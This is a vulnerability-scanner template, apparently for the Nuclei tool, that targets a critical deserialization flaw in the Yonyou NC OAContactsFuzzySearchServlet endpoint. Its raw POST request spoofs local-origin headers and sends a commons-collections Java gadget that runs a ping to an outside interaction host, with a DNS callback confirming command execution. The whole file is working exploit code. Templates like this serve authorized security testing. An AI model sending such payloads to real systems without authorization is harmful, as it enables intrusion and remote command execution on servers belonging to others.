http:
    - matchers:
        - part: interactsh_protocol
          type: word
          words:
            - dns
      raw:
        - |
          POST /servlet/~webbd/nc.uap.bs.im.servlet.OAContactsFuzzySearchServlet HTTP/1.1
          Host: {{Hostname}}
          X-Forwarded-For: 127.0.0.10
          X-Originating-IP: 127.0.0.10
          X-Remote-Addr: 127.0.0.10
          X-Remote-IP: 127.0.0.10

          {{generate_java_gadget("commons-collections3.1", "ping {{interactsh-url}}", "raw")}}
id: yonyou-nc-oacontactsfuzzysearchservlet-rce
info:
    author: SleepingBag945
    name: 用友NC OAContactsFuzzySearchServlet 反序列化
    severity: critical
    tags:
        - Servlet
